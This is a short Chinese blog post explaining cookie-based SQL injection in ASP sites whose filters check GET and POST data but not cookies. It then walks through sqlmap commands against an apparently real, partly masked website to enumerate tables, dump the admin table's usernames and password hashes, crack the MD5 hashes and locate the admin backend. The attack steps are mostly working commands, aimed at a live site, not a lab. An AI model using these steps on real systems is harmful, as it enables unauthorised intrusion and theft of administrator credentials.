首页 > 代码库 > cookie注入

cookie注入

我先说一下什么是cookies注入,如果你学过ASP,你应该知道Request.QueryString(get)或Requset.FORM)(POST)

这就是我们读取用户发给WEB服务器的指定键的值!
有时我们为了简化代码,会写成

ID=Request("ID")

这样写法是简单,但是问题就来了

cookie注入利用的环境

我们知道WEB服务是怎样读取数据的,他是先GET中的数据,没有再取POST中的数据,还回去取cookies中的数据

我们再看看房主入系统,她会检测GET和POST中的数据。如果有特殊字符(‘   and   order by)禁止数据的提交,比如下图所示:

技术分享

但是它并没有检测cookies中的数据,所以我们就可以对这个网站发动攻击。

技术分享

可以看到ID=205,所以我们可以用sqlmap对这个网站发动攻击.

1:首先打开sqlmap,需要声明一点,在sqlmap中使用cookie注入,level >=2才行

输入命令:sqlmap.py -u " http://www.***.com/shownews.asp" --cookie="id=207" --level 2
检测到此url含有注入点,再来!


2:sqlmap.py -u " http://www.***.com/shownews.asp" --cookie="id=207" --level 2  --tables   获取数据库中的所有表

技术分享



3:接下来对这个admin进行检测sqlmap.py -u "http://www.***.com/shownews.asp" --cookie="id=205" --level 2 --tables -T admin --column

技术分享

4:然后对这个username和password进行爆破

sqlmap.py -u "http://www.***.com/shownews.asp" --cookie="id=205" --level 2 --tables -T admin -C username,password --dump

技术分享

5:爆出来后密码是用md5形式加密的,所以拿到相应的网站解密就可以了。然后就是找后台就可以了;


结束!

本文出自 “costin” 博客,请务必保留此出处http://brighttime.blog.51cto.com/12837169/1918560

cookie注入